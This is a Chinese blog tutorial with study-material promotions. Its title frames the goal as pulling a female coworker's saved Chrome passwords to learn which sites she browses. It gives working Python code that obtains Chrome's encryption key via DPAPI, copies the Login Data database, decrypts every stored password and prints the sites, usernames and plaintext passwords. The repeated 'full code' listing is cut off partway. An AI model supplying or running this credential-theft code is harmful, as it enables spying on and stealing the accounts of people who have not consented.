同事女神小姐姐经常用网页浏览那种东西。用Python提取Chrome浏览器保存的密码！就自然找到是哪个网站了！(1)

admin管理员组

文章数量:1667457

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友，可以戳这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

在直接进入提取 chrome密码之前，我们需要定义一些有用的函数来帮助我们在主函数中。

def get_chrome_datetime(chromedate):

“”"从chrome格式的datetime返回一个datetime.datetime对象

因为’chromedate’的格式是1601年1月以来的微秒数"“”

return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():

local_state_path = os.path.join(os.environ[“USERPROFILE”],“AppData”, “Local”, “Google”, “Chrome”,“User Data”, “Local State”)

with open(local_state_path, “r”, encoding=“utf-8”) as f:

local_state = f.read()

local_state = json.loads(local_state)

从Base64解码加密密钥

key = base64.b64decode(local_state[“os_crypt”][“encrypted_key”])

删除 DPAPI str

key = key[5:]

返回最初加密的解密密钥

使用从当前用户的登录凭据派生的会话密钥

官方文档doc: http://timgolden.me.uk/pywin32-docs/win32crypt.html

return win32crypt.CryptUnprotectData(key, None, None, None, 0)[1]

def decrypt_password(password, key):

try:

获取初始化向量

iv = password[3:15]

password = password[15:]

生成密码

cipher = AES.new(key, AES.MODE_GCM, iv)

解密密码

return cipher.decrypt(password)[:-16].decode()

except:

try:

return str(win32crypt.CryptUnprotectData(password, None, None, None, 0)[1])

except:

not supported

return “”

get_chrome_datetime()函数负责将 chrome 日期格式转换为人类可读的日期时间格式。 get_encryption_key()函数提取并解码用于加密密码的AES密钥，这"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\Local State"作为 JSON 文件存储在路径中

decrypt_password() 将加密密码和 AES 密钥作为参数，并返回密码的解密版本。

下面是main主要功能：

def main():

获取AES密钥

key = get_encryption_key()

本地sqlite Chrome数据库路径

db_path = os.path.join(os.environ[“USERPROFILE”], “AppData”, “Local”,“Google”, “Chrome”, “User Data”, “default”, “Login Data”)

将文件复制到其他位置

因为如果chrome当前正在运行，数据库将被锁定

filename = “ChromeData.db”

shutil.copyfile(db_path, filename)

连接数据库

db = sqlite3.connect(filename)

cursor = db.cursor()

登录表中有我们需要的数据

cursor.execute(“select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created”)

iterate over all rows

for row in cursor.fetchall():

origin_url = row[0]

action_url = row[1]

username = row[2]

password = decrypt_password(row[3], key)

date_created = row[4]

date_last_used = row[5]

if username or password:

print(f"Origin URL: {origin_url}")

print(f"Action URL: {action_url}")

print(f"Username: {username}")

print(f"Password: {password}")

else:

continue

if date_created != 86400000000 and date_created:

print(f"Creation date: {str(get_chrome_datetime(date_created))}")

if date_last_used != 86400000000 and date_last_used:

print(f"Last Used: {str(get_chrome_datetime(date_last_used))}")

print(“=”*50)

cursor.close()

db.close()

try:

尝试删除复制的db文件

os.remove(filename)

except:

pass

首先，我们使用之前定义的get_encryption_key()函数获取加密密钥，然后我们将 sqlite 数据库（位于"%USERPROFILE%\AppData\Local\Google\Chrome\User Data\default\Login Data"保存密码的位置）复制到当前目录并连接到它，这是因为原始数据库文件将被锁定Chrome 当前正在运行。

之后，我们对登录表进行选择查询并遍历所有登录行，我们还解密每个密码date_created并将date_last_used日期时间重新格式化为更易于阅读的格式。

最后，我们打印凭据并从当前目录中删除数据库副本。

让我们调用主函数，完美提取Chrome浏览器保存的密码：

完整代码

import os

import json

import base64

import sqlite3

import win32crypt

from Crypto.Cipher import AES

import shutil

from datetime import datetime, timedelta

def get_chrome_datetime(chromedate):

“”"从chrome格式的datetime返回一个datetime.datetime对象

因为’chromedate’的格式是1601年1月以来的微秒数"“”

return datetime(1601, 1, 1) + timedelta(microseconds=chromedate)

def get_encryption_key():

local_state_path = os.path.join(os.environ[“USERPROFILE”],

“AppData”, “Local”, “Google”, “Chrome”,

“User Data”, “Local State”)

with open(local_state_path, “r”, encoding=“utf-8”) as f:

local_state = f.read()

local_state = json.loads(local_state)

key = base64.b64decode(local_state[“os_crypt”][“encrypted_key”])

key = key[5:]

最后

不知道你们用的什么环境，我一般都是用的Python3.6环境和pycharm解释器，没有软件，或者没有资料，没人解答问题，都可以免费领取（包括今天的代码），过几天我还会做个视频教程出来，有需要也可以领取~

给大家准备的学习资料包括但不限于：

Python 环境、pycharm编辑器/永久激活/翻译插件

python 零基础视频教程

Python 界面开发实战教程

Python 爬虫实战教程

Python 数据分析实战教程

python 游戏开发实战教程

Python 电子书100本

Python 学习路线规划

网上学习资料一大堆，但如果学到的知识不成体系，遇到问题时只是浅尝辄止，不再深入研究，那么很难做到真正的技术提升。

需要这份系统化学习资料的朋友，可以戳这里获取

一个人可以走的很快，但一群人才能走的更远！不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人，都欢迎加入我们的的圈子（技术交流、学习资源、职场吐槽、大厂内推、面试辅导），让我们一起学习成长！

本文标签： 女神网页浏览同事浏览器姐姐